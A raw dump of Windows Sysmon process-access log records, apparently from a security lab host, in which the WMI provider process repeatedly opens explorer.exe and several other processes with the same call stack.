16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 